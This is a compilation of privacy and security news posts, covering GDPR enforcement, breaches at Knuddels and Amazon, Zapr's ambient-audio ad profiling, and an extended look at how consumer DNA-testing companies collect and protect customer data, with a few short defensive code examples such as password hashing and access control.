China serves as a cautionary tale. The country has long been a world leader in the ubiquitous surveillance of its citizens, with the goal not of crime prevention but of social control. They are about to further enhance their system, giving every citizen a "social credit" rating. The details are yet unclear, but the general concept is that people will be rated based on their activities, both online and off. Their political comments, their friends and associates, and everything else will be assessed and scored. Those who are conforming, obedient, and apolitical will be given high scores. People without those scores will be denied privileges like access to certain schools and foreign travel. If the program is half as far-reaching as early reports indicate, the subsequent pressure to conform will be enormous. This social surveillance system is precisely the sort of surveillance designed to maintain the status quo.

For social norms to change, people need to deviate from these inherited norms. People need the space to try alternate ways of living without risking arrest or social ostracization. People need to be able to read critiques of those norms without anyone's knowledge, discuss them without their opinions being recorded, and write about their experiences without their names attached to their words. People need to be able to do things that others find distasteful, or even immoral. The minority needs protection from the tyranny of the majority.

Privacy makes all of this possible. Privacy encourages social progress by giving the few room to experiment free from the watchful eye of the many. Even if you are not personally chilled by ubiquitous surveillance, the society you live in is, and the personal costs are unequivocal.

This essay originally appeared in McSweeney's issue #54: "The End of Trust." It was reprinted on Wired.com.

GDPR’s impact: The first six months

GDPR is now six months old – it’s time to take an assessment of the regulation’s impact so far. At first blush it would appear very little has changed. There are no well-publicized actions being taken against offenders. No large fines levied. So does this mean it’s yet another regulation that will be ignored? Actually nothing could be further from the truth. The day GDPR came into law, complaints were filed by data subjects against … More

The post GDPR’s impact: The first six months appeared first on Help Net Security.

Paris Call: A Missed Call or a Great Opportunity?

The inventor of the web, Tim Berners-Lee, recently launched a global campaign to save the web from the destructive effects of abuse and discrimination, political manipulation, and other threats that plague the online world. In a talk at the opening of the Web Summit in Lisbon, he called on governments, companies and individuals to […]… Read More

The post Paris Call: A Missed Call or a Great Opportunity? appeared first on The State of Security.

Facebook appeals UK fine in Cambridge Analytica privacy Scandal

Facebook appeals 500,000-pound fine for failing to protect users’ personal information in the Cambridge Analytica scandal.

Facebook is appealing the fine for failing to protect users’ privacy in the Cambridge Analytica scandal. Political consultancy firm Cambridge Analytica improperly collected data of 87 million Facebook users and misused it.

Facebook has been fined £500,000 in the U.K., the maximum fine allowed by the UK’s Data Protection Act 1998, for failing to protect users’ personal information.

Now Facebook maintains that U.K. regulators failed to prove that British users were directly affected.

Britain’s Information Commissioner’s Office also found that the company failed to be transparent about how people’s data was harvested by others.

According to the ICO, even after the misuse of the data was discovered in December 2015, Facebook did not do enough to ensure those who continued to hold it had taken adequate and timely remedial action, including deletion. Other companies continued to access Facebook users’ data, such as the SCL Group, which was able to access the platform until 2018.

Facebook considers the fine unacceptable, arguing that the practices at issue are commonly accepted online even if they threaten the privacy of users.

“Their reasoning challenges some of the basic principles of how people should be allowed to share information online, with implications which go far beyond just Facebook, which is why we have chosen to appeal,” explained the Facebook lawyer Anna Benckert.

“For example, under ICO’s theory people should not be allowed to forward an email or message without having agreement from each person on the original thread. These are things done by millions of people every day on services across the internet.”

Pierluigi Paganini

(Security Affairs – Cambridge Analytica, Facebook)

The post Facebook appeals UK fine in Cambridge Analytica privacy Scandal appeared first on Security Affairs.

Chat app Knuddels fined €20k under GDPR regulation

The case is making headlines: the German chat platform Knuddels.de (“Cuddles”) has been fined €20,000 for storing user passwords in plain text.

In July, hackers breached the systems of the company Knuddels and leaked its data online.

In September, an unknown individual notified Knuddels that crooks had published the user data of roughly 8,000 members on Pastebin and that much more data had been leaked via Mega.nz.

Knuddels published a data breach notification and forced users to change their passwords; the company also duly reported the incident to the Baden-Württemberg data protection authority.

“Hello dear ones, 
when you log into the chat, you are currently asked to change your password. 
That’s a precaution. Account data from Knuddels have been published on the internet. Although we are currently not aware of any third-party use, we have temporarily deactivated these accounts for their security.” reads a message published on the company forum.

“We are currently checking whether there is a security vulnerability on the platform. As soon as we have more information, we’ll let you know, of course. For problems and questions please contact our support at community@knuddels.de.
Please use the hint when logging in and change your password.”

According to the German Spiegel Online, hackers leaked over 800,000 email addresses and more than 1.8 million user credentials on Mega.nz.

“The company from Karlsruhe violated the obligation to ensure the security of personal data,” the Baden-Württemberg data protection commissioner Stefan Brink announced on Thursday in Stuttgart, as reported by Spiegel Online.

Brink credited the company for turning to the DPA after the hacker attack and for informing users immediately and extensively about it. According to the company, around 808,000 e-mail addresses and 1,872,000 pseudonyms and passwords were stolen by unknown persons and published on the Internet.

At the time, the company had verified 330,000 of the published email addresses. The chat platform violated the GDPR by storing passwords in clear text, and for this reason the regulator imposed its first penalty under the privacy regulation.

The fine was not higher because the company cooperated with the authorities.

“Due to a breach of the data security required by Art. 32 DS-GVO, the penalty office of LfDI Baden-Württemberg imposed a fine of EUR 20,000 by decision of 21.11.2018 against a Baden-Württemberg social media provider and – in constructive collaboration with the company – ensured significant improvements in the security of user data.” reads the statement from the Baden-Württemberg data protection authority.

“By storing the passwords in clear text, the company knowingly violated its duty to ensure data security in the processing of personal data.”
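For context, the baseline Art. 32 points at here is long-established engineering practice: store only a salted, slow hash of each password, never the password itself. A minimal sketch in TypeScript using the bcryptjs npm package, chosen purely for illustration (nothing here describes Knuddels’ actual stack):

    import * as bcrypt from "bcryptjs"; // npm install bcryptjs

    // Store only a salted, slow hash; bcrypt generates the salt itself.
    // A cost factor of 12 is a common choice; raise it as hardware improves.
    async function hashForStorage(password: string): Promise<string> {
      return bcrypt.hash(password, 12);
    }

    // At login, compare the submitted password against the stored hash.
    // The plain-text password never needs to be persisted anywhere.
    async function checkLogin(password: string, storedHash: string): Promise<boolean> {
      return bcrypt.compare(password, storedHash);
    }

Had the leaked table held hashes like these instead of plain text, the Pastebin and Mega.nz dumps would have exposed pseudonyms and e-mail addresses but not working credentials.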

The authority’s State Commissioner for Data Protection and Freedom of Information, Stefan Brink, confirmed that it avoided imposing the highest possible fine; it did not want to bankrupt the company.

“The overall financial burden on the company was taken into account in addition to other circumstances,” the authority noted.

“The hacker attack was a real stress test for Knuddels,” declared the managing director of Knuddels GmbH & Co. KG, Holger Kujath. “It was immediately clear that the trust of users could only be regained with transparent communication and an immediately noticeable improvement in IT security. Knuddels is safer than ever.”

Pierluigi Paganini

(Security Affairs – GDPR, data breach)

The post Chat app Knuddels fined €20k under GDPR regulation appeared first on Security Affairs.

India-Based Zapr Has Developed Tech That Listens To Ambient Sounds Around Users To Build Targeted Ad Profiles, Several Popular Local Services Use Its Tech

Bengaluru-based Zapr Media Labs, which counts Rupert Murdoch-led media group Star and several major local companies -- including Flipkart (which is now owned by Walmart), music streaming service Saavn, and handset maker Micromax -- as its investors, has developed tech that listens to ambient sounds around users to build targeted advertising profiles of them, reports news outlet FactorDaily. Zapr does this by using the microphone on the smartphone. Several major services in the country, from Chota Bheem games to Dainik Bhaskar (a news outlet) to, likely, even Hotstar (a hugely popular streaming service which launched its service in the US and Canada last year and which, as you may recall, set a global record for most simultaneous views earlier this year), have embedded Zapr's technology into their apps. FactorDaily reports that most of these services are not forthcoming to their customers about what kind of monitoring they are doing. An excerpt from the report: One of the apps that inspired Zapr's founding team was the popular music detection and identification app Shazam. But its three co-founders saw an opportunity in going further. "Instead of detecting music, can we detect all kinds of medium? Can we detect television? Can we detect movies in a theatre? Can we detect video on demand? Can we really build a profile for a user about their media consumption habits... and that really became the idea, the vision we wanted to solve for," Sandipan Mondal, CEO of Zapr Media Labs, said in an interview last Thursday. Shorn of jargon, the underlying Zapr tech listens to ambient sounds around you, analyses them, and profiles users based on their media consumption habits. "That data would be very useful in order to recommend the right kind of content and also for brands and advertisers to hopefully reduce the wastage and inefficiencies and make smarter decisions," said Mondal, who co-founded the company in 2012 along with his batchmates from the Indian Institute of Management, Ahmedabad (batch of 2010), Deepak Baid and Sajo Mathews. Zapr claims to have the largest media consumption analytics database in India and helps television channels and brands get more bang for their advertising buck. To be sure, advertising -- even with the internet's promise of better targeting -- is still an inaccurate business, with proxies, at best, helping measure its return on investment. But Zapr's tech comes with privacy and data concerns -- lots of them.
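Zapr's own pipeline is proprietary, but the Shazam-style idea its founders describe is well documented: collapse audio into its dominant spectral peaks and hash them, so that a few seconds of ambient sound can be matched against a database of known TV and ad audio. A toy sketch of that constellation approach, using a deliberately naive DFT rather than production-grade signal processing:

    // Toy sketch of constellation-style audio fingerprinting (the Shazam
    // family of techniques). This is NOT Zapr's proprietary pipeline --
    // just the published idea: reduce audio to spectral peaks, then hash
    // peak pairs so short snippets can be matched against known audio.

    // Naive DFT magnitudes for one window (O(n^2); fine for a sketch).
    function magnitudes(window: Float32Array): number[] {
      const n = window.length;
      const mags: number[] = [0]; // zero out the DC bin so it never wins
      for (let k = 1; k < n / 2; k++) {
        let re = 0;
        let im = 0;
        for (let t = 0; t < n; t++) {
          const angle = (-2 * Math.PI * k * t) / n;
          re += window[t] * Math.cos(angle);
          im += window[t] * Math.sin(angle);
        }
        mags.push(Math.hypot(re, im));
      }
      return mags;
    }

    // Dominant frequency bin per window = one "star" in the constellation.
    function peakBins(samples: Float32Array, windowSize = 1024): number[] {
      const peaks: number[] = [];
      for (let start = 0; start + windowSize <= samples.length; start += windowSize) {
        const mags = magnitudes(samples.subarray(start, start + windowSize));
        peaks.push(mags.indexOf(Math.max(...mags)));
      }
      return peaks;
    }

    // Hash adjacent peak pairs; matching many hashes against a reference
    // track identifies what was playing near the microphone.
    export function fingerprint(samples: Float32Array): string[] {
      const peaks = peakBins(samples);
      const hashes: string[] = [];
      for (let i = 0; i + 1 < peaks.length; i++) {
        hashes.push(`${peaks[i]}:${peaks[i + 1]}`);
      }
      return hashes;
    }

Real deployments use FFTs, time-offset peak pairs, and fuzzy matching, but the sketch captures the privacy-relevant point: the phone does not have to upload raw audio, only compact fingerprints of whatever is playing nearby.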

Read more of this story at Slashdot.

Adult video game website High Tail Hall hacked; user data stolen

By Waqas

The latest report from breach monitoring website HaveIBeenPwned reveals that in August, popular adult video game website High Tail Hall (HTH) was hacked and private data of about half a million subscribers was stolen. The leaked data includes names, email IDs, and order histories among other details. After a few months, the stolen data was […]

This is a post from HackRead.com Read the original post: Adult video game website High Tail Hall hacked; user data stolen

Black Friday Scams: Shop Safely with These Tips

By Carolina

Black Friday is just around the corner and here’s how you can protect yourself from Black Friday scams. All the shopaholics around the globe are gearing up to grab the best deals for their bucks. People wait for Black Friday the entire year because, on this day, all the retail outlets offer exclusive discount deals, […]

This is a post from HackRead.com Read the original post: Black Friday Scams: Shop Safely with These Tips

Smashing Security #105: Facebook, Nietzsche, Tesla, and Nicole

Tesla takes customer service a step too far, is it a romantic gesture or stalking when you email 246 women called Nicole, and Carole finds herself in a Facebook dilemma.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Jessica Barker.

Amazon data breach: Names & email addresses of customers exposed online

By Carolina

The e-commerce giant Amazon has announced that it has suffered a major data breach in which names and email addresses of its registered customers have been exposed on its website – The incident occurred a few days before Black Friday. The company did not reveal what exactly happened, how many users were impacted or what’s their […]

This is a post from HackRead.com Read the original post: Amazon data breach: Names & email addresses of customers exposed online

Amazon Has Emailed an Unspecified Number of Customers To Inform Them That Their Names and Addresses Were Disclosed by the Website, Blames ‘Technical Error’

If you have received a strange email from Amazon today, you're not alone. A number of customers on Wednesday received an email from the company in which it notes that it "inadvertently disclosed your name and email address due to a technical error." The company confirmed to BetaNews that the emails are genuine, but did not discuss the nature and severity of the technical error or how many customers are impacted. The technical error impacted customers in the United States as well as the United Kingdom. It remains unclear if customers elsewhere were affected too. In a statement, the company said, "We have fixed the issue and informed customers who may have been impacted."

Read more of this story at Slashdot.

Amazon UK is notifying a data breach to its customers days before Black Friday

Many readers of the Register shared with the media outlet an email sent from the Amazon UK branch notifying them of an accidental data leak.

The news is disconcerting: Amazon has suffered a data breach just a few days before Black Friday.

Amazon informed its customers that it had “inadvertently disclosed [their] name and email address due to a technical error”.

The messages include an HTTP link to the company website and read:

“Hello,

We’re contacting you to let you know that our website inadvertently disclosed your name and email address due to a technical error. The issue has been fixed. This is not a result of anything you have done, and there is no need for you to change your password or take any other action.

Sincerely, Customer Service”

The Register confirmed that the email is genuine and that it was sent by Amazon UK; the press office acknowledged its authenticity.

“We have fixed the issue and informed customers who may have been impacted.” states the press office.

At the time of writing, the number of affected customers is unclear, as is whether Amazon has informed the Information Commissioner’s Office.

The company did not disclose technical details of the incident, and its root cause is not known.

The Register pointed out that it is not only UK customers who are receiving a data breach notification from Amazon; people from the US, the Netherlands and South Korea also claim to have received the same message.

Pierluigi Paganini

(Security Affairs – Amazon UK, hacking)

The post Amazon UK is notifying a data breach to its customers days before Black Friday appeared first on Security Affairs.

Beyond governance, risk and compliance: privacy, ethics and trust

We are currently experiencing the fourth industrial revolution (FIR), characterised by a blurred fusion of all things physical, digital and genomic. Each revolution has been accompanied by a privacy legislation wave, linking its governance to the accelerating pace of change. So we find ourselves in the fourth privacy wave, where technological changes outpace regulation – causing consumer fear and digital distrust, and resulting in strong ethical arguments for aggressive improvements in organisations’ privacy practices.

One of those arguments is consumer trust. The 2017 Edelman Trust Barometer reveals that trust is in crisis around the world. To rebuild trust, Edelman argues that organisations must step outside their traditional roles and work towards a new, more integrated operating model that positions consumers, and their trust concerns, at the centre of the organisation’s activities. Organisations should address data protection not just because legislation mandates it, but because empowering customers to control their data engenders trust, creates shared ‘value’, and wins consumer loyalty.

“The trust dynamic between consumers and organisations is on a knife’s edge, with consumers reporting that the values of honesty and integrity have been eroded when it comes to personal data – leaving them feeling cynical and increasingly unwilling to share their data at all” – Whose Data Is It Anyway? CIM Survey 2016

Although many FIR technologies are positively transforming consumer lives, they still depend hugely on large quantities of consumer data, giving rise to increased personal data sharing. A recent study by Columbia Business School found that 75% of consumers are willing to share their data if they trust the brand and are more willing to do so in exchange for benefits, such as reward points and personalisation – but only if it’s on ethical, fair and transparent terms.

Big data = big ethics?

The more data consumers share, the more an organisation can leverage that data for personalisation and innovation, which leads to increased share value. However, according to Gartner, in 2018 half of business ethics violations will occur through improper use of big data analytics. The exponential growth in adblocking over recent years shows how consumers feel about improper use of their data (with Irish and Greek consumers topping the European average, at over 50%).

Just as consumers are known to share more information when they trust an organisation, the opposite is true with distrust. Boston Consulting Group has found that consumers radically reduce data sharing when they distrust an organisation.

Digital ethics and privacy are one of Gartner’s top ten strategic technology trends for 2019. It writes: “any discussion on privacy must be grounded in the broader topic of digital ethics and the trust of consumers, constituents and employees. Ultimately an organisation’s position on privacy must be driven by its broader position on ethics and trust”.

Doing rights vs doing right

Shifting from privacy to ethics moves the conversation beyond ‘doing rights’ toward ‘doing right’. This ethical approach to data privacy recognises that feasible, useful or profitable does not equal sustainable, and emphasises accountability over compliance with the letter of the law. In the digital economy, the existence of, and compliance with, regulation will no longer be enough to engender consumer trust.

Organisations need to find ways to let their consumers know that they use consumer data in a law-abiding and ethical manner. Organisations that ethically manage data and solve the consumer-privacy-trust equation are more likely to win loyal consumers who pay a premium for their products and services. For example, Lego has placed the protection of children’s data at the heart of its information protection strategy. It limits integration with social media, shows strong corporate responsibility regarding use of customer data by suppliers and partners, and forbids third-party cookies on websites aimed at children under 13. Apple, too, mandates that any new use of its customer data requires sign-off from a committee of three “privacy czars” and a c-suite executive.

Sustaining trust

As data stewards, organisations should understand the dynamics and profile of their consumers and the factors that lead to their trust. Organisations can then communicate their compliance initiatives in a way that can more openly nurture and sustain the trust relationship with the consumer.

This in turn will enable them to better design how and where they should communicate their data protection activities to maximum effect. It also results in a more socially responsible and sustainable privacy protection regime for the fourth privacy legislation wave.

Valerie Lyons is chief operations officer at BH Consulting and IRC PhD Scholar at DCU Business School

The post Beyond governance, risk and compliance: privacy, ethics and trust appeared first on BH Consulting.

What DNA testing kit companies are really doing with your data

Sarah* hovered over the mailbox, envelope in hand. She knew as soon as she mailed off her DNA sample, there’d be no turning back. She ran through the information she looked up on 23andMe’s website one more time: the privacy policy, the research parameters, the option to learn about potential health risks, the warning that the findings could have a dramatic impact on her life.

She paused, instinctively retracting her arm from the mailbox opening. Would she live to regret this choice? What could she learn about her family, herself that she may not want to know? How safe did she really feel giving her genetic information away to be studied, shared with others, or even experimented with?

Thinking back to her sign-up experience, Sarah suddenly worried about the massive amount of personally identifiable information she had already handed over to the company. With a background in IT, she knew what a juicy target her and other customers’ data would be for a potential hacker. Realistically, how safe was her data from a potential breach? She tried to recall the specifics of the EULA, but the wall of legalese text melted before her memory.

Pivoting on her heel, Sarah began to turn away from the mailbox when she remembered just why she wanted to sign up for genetic testing in the first place. She was compelled to learn about her own health history after finding out she had a rare genetic disorder, Ehlers-Danlos syndrome, and wanted to submit her DNA for the purpose of further research. In addition, she was on a mission to find her mother’s father. She had a vague idea of who he was, but no clue how to track him down, and believed DNA testing could lead her in the right direction.

Sarah closed her eyes and pictured her mother’s face when she told her she found her dad. With renewed conviction, she dropped the envelope in the mailbox. It was done.

*Not her real name. Subject asked that her name be changed to protect her anonymity.

An informed decision

What if Sarah were you? Would you be inclined to test your DNA to find out about your heritage, your potential health risks, or discover long lost family members? Would you want to submit a sample of genetic material for the purpose of testing and research? Would you care to have a trove of personal data stored in a large database alongside millions of other customers? And would you worry about what could be done with that data and genetic sample, both legally and illegally?

Perhaps your curiosity is powerful enough to sign up without thinking through the consequences. But this would be a dire mistake. Sarah spent a long time weighing the pros and cons of her situation, and ultimately made an informed decision about what to do with her data. But even she was missing parts of the puzzle before taking the plunge. DNA testing is so commonplace now that we’re blindly participating without truly understanding the implications.

And there are many. From privacy concerns to law enforcement controversies to life insurance accessibility to employment discrimination, red flags abound. And yet, this fledgling industry shows no signs of stopping. As of 2017, an estimated 12 million people have had their DNA analyzed through at-home genealogy tests. Want to venture a guess at how many of those read through the 21-page privacy policy to understand exactly how their data is being used, shared, and protected?

Nowadays, security and privacy cannot be assumed. Between hacks of major social media companies and underhanded sharing of data with third parties, there are ways that companies are both negligent of the dangers of storing data without following best security practices and complicit in the dissemination of data to those willing to pay—whether that’s in the name of research or not.

So I decided to dig into exactly what these at-home DNA testing kit companies are doing to protect their customers’ most precious data, since you can’t get much more personally identifiable than a DNA sample. How seriously are these organizations taking the security of their data? What is being done to secure these massive databases of DNA and other PII? How transparent are these companies with their customers about what’s being done with their data?

There’s a lot to unpack with commercial DNA testing—often pages and pages of documents to sift through regarding privacy, security, and design. It can be mind-numbingly difficult to process, which is why so many customers just breeze through agreements and click “Okay” without really thinking about what they’re purchasing.

But this isn’t some app on your phone or software on your computer. It’s data that could be potentially life-changing. Data that, if misinterpreted, could send people into an emotional tailspin, or worse, a false sense of security. And it’s data that, in the wrong hands, could be used for devastating purposes.

In an effort to better educate users about the pros and cons of participating in at-home DNA testing, I’m going to peel back the layers so customers can see for themselves, as clearly as possible, the areas of concern, as well as the benefits of using this technology. That way, users can make informed choices about their DNA and related data, information that we believe should not be taken or given away lightly.

That way, when it’s your turn to stand in front of the mailbox, you won’t be second-guessing your decision.

Area of concern: life insurance

Only a few years ago in the United States, health insurance companies could deny applicants coverage based on pre-existing conditions. While this is thankfully no longer the case, life insurance companies can be more selective about who they cover and how much they charge.

According to the American Council of Life Insurers (ACLI), a life insurance company may ask an applicant for any relevant information about their health—and that includes the results of a genetic test, if one was taken. Any indication of health risk could factor into the price tag of coverage here in the United States.

Of course, there’s nothing that forces an individual to disclose that information when applying for life insurance. But the industry relies on honest communication from its customers in order to effectively price policies.

“The basis of sound underwriting has always been the sharing of information between the applicant and the insurer—and that remains today,” said Dr. Robert Gleeson, consultant for the ACLI. “It only makes sense for companies to know what the applicant knows. There must be a level playing field.”

The ACLI believes that the introduction of genetic testing can actually help life insurers better determine risk classification, enabling them to offer overall lower premiums for consumers. However, the fact remains: If a patient receives a diagnosis or if genetic testing reveals a high risk for a particular disease, their insurance premiums go up.

In Australia, any genetic results deemed a health risk can result in not only increased premiums but denial of coverage altogether. And if you thought Australians could get away with a little white lie of omission when applying for life insurance, think again: they are bound by law to disclose any known genetic test results, including those from at-home DNA testing kits.

Area of concern: employment

Going back as far as 1964 to Title VII of the Civil Rights Act, employers cannot discriminate based on race, color, religion, sex, or nationality. Workers with disabilities or other health conditions are protected by the Americans with Disabilities Act, the Rehabilitation Act, and the Family and Medical Leave Act (FMLA).

But these regulations only apply to employees or candidates with a demonstrated health condition or disability. What if genetic tests reveal the potential for disability or health concern? For that, we have GINA.

The Genetic Information Nondiscrimination Act (GINA) prohibits the use of genetic information in making employment decisions.

“Genetic information is protected under GINA, and cannot be considered unless it relates to a legitimate safety-sensitive job function,” said John Jernigan, People and Culture Operations Director at Malwarebytes.

So that’s what the law says. What happens in reality might be a different story. Unfortunately, it’s popular practice for individuals to share their genetic results online, especially on social media. In fact, 23andMe has even sponsored celebrities unveiling and sharing their results. Surely no one will see videos of stars like Mayim Bialik sharing their 23andMe results live and follow suit.

The hiring process is incredibly subjective. It would be almost impossible to point the finger at any employer and say, “You didn’t hire me because of the screenshot I shared on Facebook of my 23andMe results!” It could be entirely possible that the candidate was discriminated against, but in court, any he said/she said arguments will benefit the employer and not the employee.

Our advice: steer clear of sharing the results, especially any screenshots, on social media. You never know how someone could use that information against you.

Area of concern: personally identifiable information (PII)

Consumer DNA tests are clearly best known for collecting and analyzing DNA. However, just as important—arguably more so to their bottom line—is the personally identifiable information they collect from their customers at various points in their relationship. Organizations are absorbing as much as they can about their customers in the name of research, yes, but also in the name of profit.

What exactly do these companies ask for? Besides the actual DNA sample, they collect and store content from the moment of registration, including your name, credit card, address, email, username and password, and payment methods. But that’s just the tip of the iceberg.

Along with the genetic and registration data, 23andMe also curates self-reported content through a hulking, 45-minute-long survey delivered to its customers. This includes asking about disease conditions, medical and family history, personal traits, and ethnicity. 23andMe also tracks your web behavior via cookies, and stores your IP address, browser preference, and which pages you click on. Finally, any data you produce or share on its website, such as text, music, audio, video, images, and messages to other members, belongs to 23andMe. Getting uncomfortable yet? These are hugely attractive targets for cybercriminals.

Survey questions gather loads of sensitive PII.

Oh, but there’s more. Companies such as Ancestry or Helix have ways to keep their customers consistently involved with their data on their sites. They’ll send customers a message saying, “You disclosed to us you had allergies. We’re doing this study on allergies—can you answer these questions?” And thus even more information is gathered.

Taking a closer look at the companies’ EULAs, you’ll discover that PII can also be gathered from social media, including any likes, tweets, pins, or follow links, as well as any profile information from Facebook if you use it to log into their web portals.

But the information-gathering doesn’t stop there. Ancestry and others will also search public and historical records, such as newspaper mentions, birth, death, and marriage records related to you. In addition, Ancestry cites a frustratingly vague “information collected from third parties” bullet point in their privacy policy. Make of that what you will.

Speaking of third parties, many of them will get a good glimpse of who you are thanks to policies that allow commercial DNA testing companies to market new product offers from business partners, including targeted ads personalized to users based on their interests. And finally, according to the privacy policy shared among many of these sites, DNA testing companies can and do sell your aggregate information to third parties “in order to perform business development, initiate research, send you marketing emails, and improve our services.”

That’s a lot of marketing emails.

One such partner that benefits from the sharing of aggregate information is Big Pharma: at-home DNA testing companies profit by selling user data to pharmaceutical companies for the development of new drugs. For some, this might constitute crossing the line; for others, it represents being able to help researchers and those suffering from disease with their data.

“You have to trust all their affiliates, all their employees, all the people that could purchase the company,” said Sarah, our IT girl who elected to participate in 23andMe’s research. “It’s better to take the mindset that there’s potential that any time this could be seen and accessed by anyone. You should always be willing to accept that risk.”

Sadly, there’s already more than enough reason to assume any of this information could be stolen—because it has.

In June 2018, MyHeritage announced that the data of over 92 million users had been exposed in October of the previous year. Emails and hashed passwords were stolen—thankfully, customers’ DNA and other data were safe. Prior to that, the emails and passwords of 300,000 Ancestry.com users were stolen back in 2015.

But as these databases grow and more information is gathered on individuals, the mark only becomes juicier for threat actors. “They want to create as broad a profile of the target as possible, not just of the individual but of their associates,” said security expert and founder of Have I Been Pwned Troy Hunt, who tipped off Ancestry about their breach. “If I know who someone’s mother, father, sister, and descendants might be, imagine how convincing a phishing email I could create. Imagine how I could fool your bank.”

Cybercriminals can weaponize data not only to resell to third parties but for blackmail and extortion purposes. Through breaching this data, criminals could dangle coveted genetic, health, and ancestral discoveries in front of their victims. You’ve got a sibling—send money here and we’ll show you who. You’re predisposed to a disease, but we won’t tell you which one until you send Bitcoin here. Years later, the Ashley Madison breach is still being exploited in this way.

Doing it right: data stored safely and separately

With so much sensitive data being collected by DNA testing companies, especially content related to health, one would hope these organizations pay special attention to securing it. In this area, I was pleasantly surprised to learn that several of the top consumer DNA tests banded together to create a robust security policy that aims to protect user data according to best practices.

And what are those practices? For starters, DNA testing kit companies store user PII and genetic data in physically separate computing environments, and encrypt the data at rest and in transit. PII is assigned a randomized customer identification number for identification and customer support services, and genetic information is only identified using a barcode system.
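As a rough sketch of what that separation might look like in practice (hypothetical names and stores, not any company's actual implementation), PII and genetic data live in entirely different systems, linked only through opaque identifiers:

    const crypto = require("crypto");

    // Two logically (and, per the policy, physically) separate stores:
    // one for PII, one for genetic data. Neither record references the other.
    const piiStore = new Map();     // keyed by a random customer ID
    const geneticStore = new Map(); // keyed by a lab barcode

    function registerCustomer(pii, genome) {
      // Random, meaningless identifiers stand in for the customer's identity.
      const customerId = crypto.randomUUID();
      const barcode = crypto.randomBytes(8).toString("hex");

      piiStore.set(customerId, pii);     // name, email, address, etc.
      geneticStore.set(barcode, genome); // raw genetic data, no PII attached

      // Only a separate linking record (ideally held in a third system,
      // under stricter access control) ties the two identifiers together.
      return { customerId, barcode };
    }

The value of the design is that a breach of either store alone yields data that is hard to tie back to a person; only the separately guarded link between customer ID and barcode connects a genome to a name.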

Security is baked into the design of the systems that gather, store, and disseminate data, including explicit security reviews in the software development lifecycle, quality assurance testing, and operational deployment. Security controls are also audited on a regular basis.

Access to the data is restricted to authorized personnel, based on job function and role, in order to reduce the likelihood of malicious insiders compromising or leaking the data. In addition, robust authentication controls, such as multi-factor authentication and single sign-on, prevent data from flowing in and out like the tides.
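A minimal sketch of that kind of role- and authentication-gated access (the roles and permission table here are invented for illustration, not drawn from any vendor's system):

    // Hypothetical permission table: which job functions may read which data class.
    const permissions = {
      "customer-support": ["pii"],
      "lab-technician": ["genetic"],
      "security-auditor": ["access-logs"],
    };

    function canAccess(user, dataClass) {
      // Deny by default; require both an authorized role and a completed MFA check.
      const allowed = permissions[user.role] || [];
      return user.mfaVerified === true && allowed.includes(dataClass);
    }

    // A support agent who has passed MFA can read PII, but never genetic data.
    const agent = { role: "customer-support", mfaVerified: true };
    console.log(canAccess(agent, "pii"));     // true
    console.log(canAccess(agent, "genetic")); // false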

For additional safety measures, consumer DNA testing companies conduct penetration testing and offer a bug bounty program to shore up vulnerabilities in their web application. Even more care has been taken with security training and awareness programs for employees, and incident management and response plans were developed with guidance from the National Institute of Standards and Technology (NIST).

In the words of the great John Hammond: They spared no expense.

When Hunt made the call to Ancestry about the breach, he recalls that they responded quickly and professionally, unlike other organizations he’s contacted about data leaks and breaches.

“There’s always a range of ways organizations tend to deal with this. In some cases, they really don’t want to know. They put up the shutters and stick their head in the sand. In some cases, they deny it, even if the data is right there in front of them.”

Thankfully, that does not seem to be the case for the major DNA testing businesses.

Area of concern: law enforcement

At-home DNA testing kit companies are a little vague about when and under which conditions they would hand over your information to law enforcement, using terms such as “under certain circumstances” and “we have to comply with valid requests” without defining the circumstances or indicating what would be considered “valid.” However, some do publish transparency reports that detail government requests for data and how the company has responded.

Yet, news broke earlier this year that consumer DNA data was used to find the Golden State Killer, and it gave consumers collective pause. While putting a serial killer behind bars is a worthy cause, the killer was found because a relative of his had taken a consumer DNA test, and the DNA was a close enough match to DNA found at the original 1970s crime scenes that investigators were able to pin him down.

This opens up a can of worms about the impact of commercially-generated genetic data being available to law enforcement or other government bodies. How else could this data be used or even abused by police, investigators, or legislators? The success of the Golden State Killer arrest could lead to re-opening other high-profile cold cases, or eventually turning to the consumer DNA databases every time there’s DNA evidence found at the scene of a crime.

Because so many individuals have now signed up for commercial DNA tests, odds are 60 percent and rising that, if you live in the US and are of European descent, you can be identified by information that your relatives have made public. In fact, law enforcement soon may not need a family member to have submitted DNA in order to find matches. According to a study published in Science, that figure will soon rise to 100 percent as consumer DNA databases reach critical mass.

What’s the big deal if DNA is used to capture criminals, though? Putting on my tinfoil hat for a second, I imagine a Minority-Report-esque scenario of stopping future crimes or misinterpreting DNA and imprisoning the wrong person. While those scenarios are a little far-fetched, I didn’t have to look too hard for real-life instances of abuse.

In July 2018, Vice reported that Canada’s border agency was using data from Ancestry.com and Familytreedna.com to establish nationalities of migrants and deport those it found suspect. In an era of high tensions on race, nationality, and immigration, it’s not hard to see how genetic data could be used against an individual or family for any number of civil or human rights violations.

Area of concern: accuracy of testing results

While this doesn’t technically fall under the umbrella of cybersecurity, the accuracy of test results is of concern because these companies are doling out incredibly sensitive information that has the potential to levy dramatic change on people’s lives. A March 2018 study in Nature found that 40 percent of results from at-home DNA testing kits were false positives, meaning someone was deemed “at risk” for a condition that later turned out to be benign. That statistic is reinforced by the fact that test results from different consumer testing companies can vary dramatically.

The relative inaccuracy of the test results is compounded by the fact that there’s a lot of room to misinterpret them. Whether it’s learning you’re high risk for Alzheimer’s or discovering that your father is not really your father, health and ancestry data can be consumed without context, and with no doctor or genetic counselor on hand to soften the blow.

In fact, consumer DNA testing companies are rather reticent to send their users to genetic counselors—it’s essentially antithetical to their mission, which is to make genetic data more accessible to their customers.

Brianne Kirkpatrick, a genetic counselor and ancestry expert with the National Society of Genetic Counselors (NSGC), said that 23andMe once had a fairly prominent link on their website for finding genetic counselors to help users understand their results. That link is now either buried or gone. In addition, she mentioned that one of her clients had to call 23andMe three times until they finally agreed to recommend Kirkpatrick’s counseling services.

“The biggest drawback is people believing that they understand the results when maybe they don’t,” she said. “For example, people don’t understand that the BRCA1 and BRCA2 testing these companies provide is really only helpful if you’re an Ashkenazi Jew. In the fine print, it says they look at three variants out of thousands, and these three are only for this population. But people rush to make a conclusion because at a high level it looks like they should be either relieved or worried. It’s complex information, which is why genetic counselors exist in the first place.”


